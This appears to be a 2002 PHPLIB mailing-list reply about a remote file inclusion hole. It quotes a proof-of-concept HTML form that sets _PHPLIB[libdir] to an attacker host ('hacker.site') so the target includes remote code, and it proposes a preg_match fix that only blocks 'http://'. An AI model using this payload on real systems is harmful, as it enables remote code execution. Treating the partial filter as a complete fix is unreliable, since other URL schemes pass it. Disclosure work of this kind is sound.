Re: [Phplib-users] security hole !!!Remote code execution !!!
Brought to you by:
nhruby,
richardarcher
Menu
▾
▴
Re: [Phplib-users] security hole !!!Remote code execution !!!
|
From: Marcin P. <cu...@se...> - 2002-03-02 16:50:15
|
Hello,
add checking $_PHPLIB["libdir"] before
include($_PHPLIB["libdir"] . "table.inc");
if in $_PHPLIB["libdir"] is string http:// then stop - exit;
It will be probably something like that:
if (preg_match('/^http:\/\//', $_PHPLIB["libdir"])) {
echo "Wrong \$_PHPLIB[\"libdir\"].";
exit;
}
include($_PHPLIB["libdir"] . "table.inc");
>
> files:
> /pages/new_user_alt.php3
> /pages/view_sessions.php3
> /pages/showoff.php3
>
> line:
> include($_PHPLIB["libdir"] . "table.inc");
>
> example:
>
> <form method=3DPOST action=3D"http://phplib.sourceforge.net/showroom/vi=
ew_sessions.php3">
> <input type=3Dhidden name=3D"_PHPLIB[libdir]" value=3D"http://hacker.si=
te/some_path/">
> <input type=3Dsubmit>
>
> versions tested: <7.4-pr1
>
> tested, (and works) on
> http://phplib.sourceforge.net/
Yes, I try and it works.
--=20
Pozdrawiam,
Marcin Pyla
(o_ [ <@ Marcin Pyla - Cubbi <cu...@se...> | <<+ NetArt ISP +>> @=
> ]
(/)_ [ Odkryto, =BFe C++ posiada niesamowit=B1 zdolno=B6=E6 do ukrywania =
]
[ nieistotnych detali w programach, takich jak bugi. =
]
|
